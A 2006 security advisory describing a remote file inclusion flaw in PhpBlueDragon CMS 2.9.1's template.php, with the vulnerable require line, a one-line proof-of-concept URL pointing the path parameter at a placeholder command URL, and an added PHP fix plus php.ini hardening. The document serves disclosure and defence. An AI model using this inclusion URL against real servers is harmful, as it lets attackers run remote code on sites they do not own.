2006-06-14 PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability
Rated as: High Risk

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Synthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

The error occurs in template.php, line 23, where the include path is built from $vsDragonRootPath:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(Note the trailing slash (/) at the end of the parameter value.)

3) Solution:

Sanitize $vsDragonRootPath.
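
One way to apply this fix at line 23 of template.php, shown as an added example (not code from the advisory or from the PhpBlueDragon project). It assumes the request parameter reaches the variable through register_globals or a similar mechanism, and that template.php sits three directories below the CMS root, as the path in the proof-of-concept URL suggests; `pbd_safe_path` is a hypothetical helper name.

```php
<?php
// Added example: hardened replacement for the require on line 23.
// Assumption: CMS root = three directories above this file
// (vphptree -> pub_templates -> public_includes -> root).

/**
 * Hypothetical helper: resolve $relative under $root and return the
 * canonical local path, or false if it does not resolve inside $root.
 */
function pbd_safe_path($root, $relative)
{
    $rootReal = realpath($root);
    $fullReal = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($rootReal === false || $fullReal === false) {
        return false; // not an existing local path (URLs also end up here)
    }
    // Containment check: the resolved target must sit under the resolved root.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($fullReal, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $fullReal;
}

// 1. Reject the request if the client tried to supply the variable.
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (array_key_exists('vsDragonRootPath', $input)) {
        header('HTTP/1.1 400 Bad Request');
        exit;
    }
}

// 2. Derive the root from this file's own location, never from request input.
$vsDragonRootPath = dirname(__FILE__) . '/../../../';

// 3. Include only a path that resolves to a local file under that root.
$custom = pbd_safe_path(
    $vsDragonRootPath,
    'public_includes/pub_kernel/pbd_template_custom.php'
);
if ($custom === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit;
}
require $custom;
```

Setting `register_globals = Off` and `allow_url_include = Off` in php.ini is a complementary server-side control for this class of bug.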
securitydot.net - 2006-06-14
